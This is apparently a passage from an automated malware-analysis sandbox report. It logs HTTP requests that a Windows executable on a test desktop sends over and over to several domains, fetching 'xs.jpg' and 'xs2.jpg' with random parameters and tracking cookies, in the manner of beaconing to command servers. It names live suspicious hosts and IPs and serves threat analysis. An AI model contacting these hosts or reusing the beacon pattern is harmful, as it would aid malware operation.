                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:52.115367889 CEST192OUTGET /xs.jpg?1786b5d7=1578817372 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:52.811662912 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:52 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  71192.168.2.94978437.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:52.887573004 CEST205OUTGET /images/xs2.jpg?180330c9=1611449124 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:53.602190018 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:53 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:53.604136944 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:53.834810019 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:53 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:53 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  72192.168.2.94978554.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:53.970855951 CEST311OUTGET /images/xs.jpg?18be425f=-973991176 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159310|1720159259|3|14|0
                                  Jul 5, 2024 08:01:54.699453115 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:54 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159314|1720159259|3|15|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  73192.168.2.94978644.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:54.711893082 CEST303OUTGET /xs.jpg?194bc1b3=-1324200987 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159311|1720159259|3|14|0
                                  Jul 5, 2024 08:01:55.235208988 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:55 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159315|1720159259|3|15|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  74192.168.2.94978744.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:55.289827108 CEST305OUTGET /images/xs.jpg?19b3dafe=-414010642 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159312|1720159260|3|14|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:55.793145895 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:55 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159315|1720159260|3|15|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  75192.168.2.94978878.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:55.807713985 CEST191OUTGET /xs.jpg?19fa4aca=871667092 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:56.487795115 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:56 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  76192.168.2.94978937.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:56.506242990 CEST206OUTGET /images/xs2.jpg?1a87f96c=-1624254328 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:57.243016005 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:57 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:57.253026009 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:57.479799032 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:57 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:57 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  77192.168.2.94979054.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:57.818702936 CEST311OUTGET /images/xs.jpg?1b477e89=-633605048 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159314|1720159259|3|15|0
                                  Jul 5, 2024 08:01:58.561428070 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:58 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159318|1720159259|3|16|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  78192.168.2.94979144.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:58.613466978 CEST301OUTGET /xs.jpg?1bf90ddb=938613686 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159315|1720159259|3|15|0
                                  Jul 5, 2024 08:01:59.120666981 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:59 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159319|1720159259|3|16|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  79192.168.2.94979244.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:59.156855106 CEST305OUTGET /images/xs.jpg?1c4eb48e=-970526750 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159315|1720159260|3|15|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:59.672311068 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:59 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159319|1720159260|3|16|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  80192.168.2.94979378.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:59.943341017 CEST192OUTGET /xs.jpg?1c954dcc=1438640484 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:00.599065065 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:00 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  81192.168.2.94979437.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:00.629569054 CEST206OUTGET /images/xs2.jpg?1d468c2f=-1839153941 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:01.362121105 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:01 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
